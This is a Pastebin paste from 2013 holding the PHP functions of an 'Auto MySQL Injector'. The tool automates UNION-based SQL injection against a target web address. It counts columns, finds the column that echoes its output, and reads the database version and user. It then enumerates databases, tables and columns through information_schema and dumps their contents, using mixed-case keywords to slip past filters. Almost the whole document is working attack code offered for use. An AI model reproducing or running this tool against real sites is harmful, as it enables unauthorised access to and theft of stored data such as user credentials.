Advertisement
Hypnoze57

fonctions.php | Auto MySQL Injector

Mar 4th, 2013
417
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.44 KB | None | 0 0
  1. <?php
  2. ##############################
  3. # Fonctions de requettes SQL #
  4. #     Coder par Hypnoze57    #
  5. ##############################
  6.  
  7. #Recherche du nombre de colonne;
  8. function nb_col($url) {
  9.     for($i=1;$i<=50;$i++) {
  10.         $page = file_get_contents($url . '+OrDeR+bY+' . $i . '--+-');
  11.             if(preg_match("#Unknown column|on line|Warning MySQL#", $page)) {
  12.                 $col_nb = $i -1;
  13.                 break;
  14.             }
  15.     }
  16.     return $col_nb;
  17. }
  18.  
  19. #Première injection;
  20. function injection($url, $nb_col) {
  21.     $chaine = '';
  22.         for($i=1;$i<=$nb_col;$i++) {
  23.             $chaine .= $i.',';
  24.         }
  25.     $chaine = substr($chaine, 0, -1);
  26.  
  27.     $url .= '+UniOn+SeLecT+'.$chaine.'--+-';
  28.     return $url;
  29. }
  30.  
  31. #Recherche de la colonne vulnérable;
  32. function string_col($url, $nb_col) {
  33.     for($i=1;$i<=$nb_col;$i++) {
  34.         $str = str_replace(','.$i.',', ',0x4879706E6F7A653537,', $url);
  35.         $page = file_get_contents($str);
  36.             if(preg_match("#Hypnoze57#", $page)) {
  37.                 $str_col = $i;
  38.                 break;
  39.             }
  40.     }
  41. return $str_col;
  42. }
  43.  
  44. #Recherche de l'user et de la version de la bdd;
  45. function find_vers_user($url, $str_col) {
  46.     $url = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,VerSion(),0x3A2F6835373A),', $url);
  47.     $pg = file_get_contents($url);
  48.     preg_match('#:h57:(.*):/h57:#', $pg, $version);
  49.     $url = str_replace('VerSion()', 'UseR()', $url);
  50.     $pg = file_get_contents($url);
  51.     preg_match('#:h57:(.*):/h57#', $pg, $user);
  52.     echo 'Version : <font color="red">'.$version[1].'</font><br />User : <font color="red">'.$user[1].'</font><br /><br />';
  53. }
  54.  
  55. #Recherche des bases de données;
  56. function find_db($url, $str_col, $url_dep) {
  57.     $db = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,SchEmA_NamE,0x3A2F6835373A),', $url);
  58.     $db = str_replace('--+-', '+FroM+iNForMaTion_SchEmA.SchEmAta--+-', $db);
  59.     $page = file_get_contents($db);
  60.     $page = str_replace(',', '', $page);
  61.     preg_match('#:h57:(.*):/h57:#', $page, $db_name);
  62.     $bdd = explode(':/h57::h57:', $db_name[1]);
  63.     foreach ($bdd as $base) {
  64.         echo '<a href="?url='.urlencode($url_dep).'&db='.$base.'">'.$base.'</a><br />';
  65.     }
  66. }
  67.  
  68. #Recherche des tables;
  69. function find_tbl($url, $str_col, $url_dep) {
  70.     if(isset($_GET['db'])) {
  71.         echo '<br /><u>Tables de la base '.$_GET['db'].' : </u><br /><br />';
  72.         $tbl = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,TabLe_NaMe,0x3A2F6835373A),', $url);
  73.         $db = str2hex($_GET['db']);
  74.         $bd = $_GET['db'];
  75.         $tbl = str_replace('--+-', '+FroM+iNForMaTion_SchEmA.TabLes+where+TabLe_SchEmA='.$db.'--+-', $tbl);
  76.         $page = file_get_contents($tbl);
  77.         preg_match('#:h57:(.*):/h57:#', $page, $tbl_name);
  78.         $tables = explode(':/h57:,:h57:', $tbl_name[1]);
  79.         foreach($tables as $tbl_fin) {
  80.             echo '<a href="?url='.urlencode($url_dep).'&db='.$bd.'&tbl='.$tbl_fin.'">'.$tbl_fin.'</a><br />';
  81.         }
  82.     }
  83. }
  84.  
  85. #Recherche des colonnes;
  86. function find_col($url, $str_col, $url_dep) {
  87.     if(isset($_GET['tbl'])) {
  88.         echo '<br /><u>Colonnes de la table '.htmlspecialchars($_GET['tbl']).' :</u><br /><br />';
  89.         $db = str2hex($_GET['db']);
  90.         $tbl = str2hex($_GET['tbl']);
  91.         $url = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,column_name,0x3A2F6835373A),', $url);
  92.         $url = str_replace('--+-', '+FroM+iNForMaTion_ScheMa.columNs+WhErE+tablE_scheMa='.$db.'+AnD+TablE_nAme='.$tbl.'--+-', $url);
  93.         $pg = file_get_contents($url);
  94.         preg_match('#:h57:(.*):/h57:#', $pg, $col_name);
  95.         $colonne = explode(':/h57:,:h57:', $col_name[1]);
  96.         foreach($colonne as $col_fin) {
  97.             echo '<a href="?url='.urlencode($url_dep).'&db='.$_GET['db'].'&tbl='.$_GET['tbl'].'&col='.$col_fin.'">'.$col_fin.'</a><br />';
  98.         }
  99.     }
  100. }
  101.  
  102. #Recherche du contenu;
  103. function find_content($url, $str_col, $url_dep) {
  104.     if(isset($_GET['col'])) {
  105.         echo '<br /><u>Contenu de la colonne '.htmlspecialchars($_GET['col']).' dans la table '.htmlspecialchars($_GET['tbl']).' :</u><br /><br />';
  106.         $url = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,'.$_GET['col'].',0x3A2F6835373A),', $url);
  107.         $url = str_replace('--+-', '+FroM+'.$_GET['db'].'.'.$_GET['tbl'].'--+-', $url);
  108.         $pg = file_get_contents($url);
  109.         preg_match('#:h57:(.*):/h57:#', $pg, $content);
  110.         $contents = explode(':/h57:,:h57:', $content[1]);
  111.         foreach($contents as $content_fin) {
  112.             echo '<font color="red">'.$content_fin.'</font><br />';
  113.         }
  114.     }
  115. }
  116.  
  117. #Fonction de conversion de table (exemple : admin = 0x61646d696e) - fonction coder par Luxerails;
  118. function str2hex($str) {
  119. $strout = '0x';
  120.     for ($i=0; $i < strlen($str); $i++) {
  121.         $strout .= dechex(ord($str{$i}));
  122.     }
  123. return $strout;
  124. }
  125. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement